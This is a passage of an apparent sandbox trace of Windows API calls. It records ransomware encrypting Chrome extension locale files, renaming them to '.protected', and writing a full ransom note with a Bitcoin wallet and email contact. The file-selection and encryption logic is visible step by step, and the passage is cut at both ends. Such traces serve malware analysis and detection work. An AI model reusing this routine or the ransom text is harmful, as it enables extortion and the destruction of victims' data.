pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.protected") returned 167 [0079.801] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.protected")) returned 1 [0079.801] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.802] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.802] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\RESTORE_FILES.txt") returned 161 [0079.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.803] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.803] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.804] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.804] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.804] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.804] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.804] CloseHandle (hObject=0x164) returned 1 [0079.804] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.804] lstrcmpiW (lpString1="lt", lpString2="Windows") returned -1 [0079.804] lstrcmpiW (lpString1="lt", lpString2="Program Files") returned -1 [0079.804] lstrcmpiW (lpString1="lt", lpString2="Program Files (x86)") returned -1 [0079.804] lstrcmpiW (lpString1="lt", lpString2="$Recycle.bin") returned 1 [0079.804] lstrcmpiW (lpString1="lt", lpString2="System Volume Information") returned -1 [0079.804] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt") returned 143 [0079.804] lstrcmpW (lpString1="lt", lpString2=".") returned 1 [0079.804] lstrcmpW (lpString1="lt", lpString2="..") returned 1 [0079.804] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\*") returned 145 [0079.804] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.805] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.805] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.805] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.805] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.805] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.805] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\.") returned 145 [0079.805] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.805] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.805] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.805] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.805] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.805] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.805] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.805] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\..") returned 146 [0079.805] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.805] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.805] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.805] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.805] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.805] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.805] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.805] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.805] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json") returned 157 [0079.805] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.805] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.805] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.805] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json") returned 157 [0079.806] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json") returned 157 [0079.806] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json") returned 157 [0079.806] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.806] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.806] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.806] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.807] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.807] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.807] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.807] CloseHandle (hObject=0x168) returned 1 [0079.807] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.protected") returned 167 [0079.807] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.protected")) returned 1 [0079.807] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.807] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.807] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\RESTORE_FILES.txt") returned 161 [0079.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.808] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.808] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.808] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.808] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.809] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.809] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.809] CloseHandle (hObject=0x164) returned 1 [0079.809] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.809] lstrcmpiW (lpString1="lv", lpString2="Windows") returned -1 [0079.809] lstrcmpiW (lpString1="lv", lpString2="Program Files") returned -1 [0079.809] lstrcmpiW (lpString1="lv", lpString2="Program Files (x86)") returned -1 [0079.809] lstrcmpiW (lpString1="lv", lpString2="$Recycle.bin") returned 1 [0079.809] lstrcmpiW (lpString1="lv", lpString2="System Volume Information") returned -1 [0079.809] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv") returned 143 [0079.809] lstrcmpW (lpString1="lv", lpString2=".") returned 1 [0079.809] lstrcmpW (lpString1="lv", lpString2="..") returned 1 [0079.809] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\*") returned 145 [0079.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.811] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.811] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.811] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.811] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.811] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.811] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\.") returned 145 [0079.811] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.811] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.812] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.812] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.812] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.812] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.812] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.812] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\..") returned 146 [0079.812] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.812] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.812] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.812] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.812] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.812] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.812] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.812] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.812] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json") returned 157 [0079.812] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.812] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.812] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.812] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.813] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json") returned 157 [0079.813] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.813] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json") returned 157 [0079.813] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.813] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json") returned 157 [0079.813] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.813] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.814] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.814] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.814] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.814] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.817] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.817] CloseHandle (hObject=0x168) returned 1 [0079.817] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.protected") returned 167 [0079.817] MoveFileW 